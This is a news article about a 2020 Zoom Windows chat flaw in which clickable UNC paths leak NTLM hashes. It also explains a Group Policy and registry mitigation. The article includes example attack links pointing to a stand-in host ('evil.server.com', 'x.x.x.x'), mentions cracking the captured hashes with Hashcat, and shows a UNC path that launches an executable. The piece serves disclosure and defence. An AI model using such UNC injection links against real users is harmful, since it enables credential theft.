With COVID-19 locking workers at home, Zoom’s videoconferencing software is seeing a tremendous surge in usage and popularity, but it’s led to some serious scrutiny that isn’t working in the platform’s favor. Following allegations of data sharing, researchers now claim that Zoom has a security bug that lets attackers steal Windows logins and passwords.
This revolves around the fact that Zoom lets users paste UNC (Universal Naming Convention) paths into a chat window (e.g., \evil.server.com\images\cat.jpg), which are then automatically translated into clickable links. According to Bleeping Computer – which reported on security researcher @_g0dmode’s initial findings – “Windows will attempt to connect to the remote site using the SMB file-sharing protocol to open the remote cat.jpg file. When doing this, by default Windows will send the user’s login name and their NTLM password hash, which can be cracked using free tools like Hashcat to dehash, or reveal, the user’s password.”
#Zoom chat allows you to post links such as \\x.x.x.x\xyz to attempt to capture Net-NTLM hashes if clicked by other users.
— Mitch (@_g0dmode) March 23, 2020
Hi @zoom_us & @NCSC – here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screen shot below shows an example UNC path link and the credentials being exposed (redacted). pic.twitter.com/gjWXas7TMO
— Hacker Fantastic (@hackerfantastic) March 31, 2020
This can also be exploited to trick a user into launching programs on a local computer. “For example, clicking on a UNC path like \127.0.0.1\C$\windows\system32\calc.exe will attempt to launch the Windows Calculator executable on the computer,” BleepingComputer explains. (Windows will show a prompt before taking any action, however.)
There’s an ongoing debate as to whether this is actually a Windows issue – some users are blaming the OS for lax security measures (e.g., easily allowing credentials to be sent to remote servers). Others say that this is a whole lot of fuss over nothing, in that it’s synonymous to someone clicking on a suspicious email link.
In any case, there is an immediate fix for Zoom users who are paranoid about this so-called security bug.
For those who do not want to wait for a fix, there is a Group Policy that can be enabled that prevents your NTML credentials from automatically being sent to a remote server when clicking on a UNC link.
This policy is called ‘Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers’ and is found under the following path in the Group Policy Editor.
Computer Configuration – Windows Settings – Security Settings – Local Policies – Security Options – Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers
If this policy is configured to Deny All, Windows will no longer automatically send your NTLM credentials to a remote server when accessing a share.
It should be noted that when this policy is configured on domain-joined machines, it could cause issues when attempting to access shares. You can view this article to learn more about adding exceptions to the above policy.
If you are a Windows 10 Home user, you will not have access to the Group Policy Editor and will have to use the Windows Registry to configure this policy.
This can be done by creating the RestrictSendingNTLMTraffic Registry value under the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 key and setting it to 2.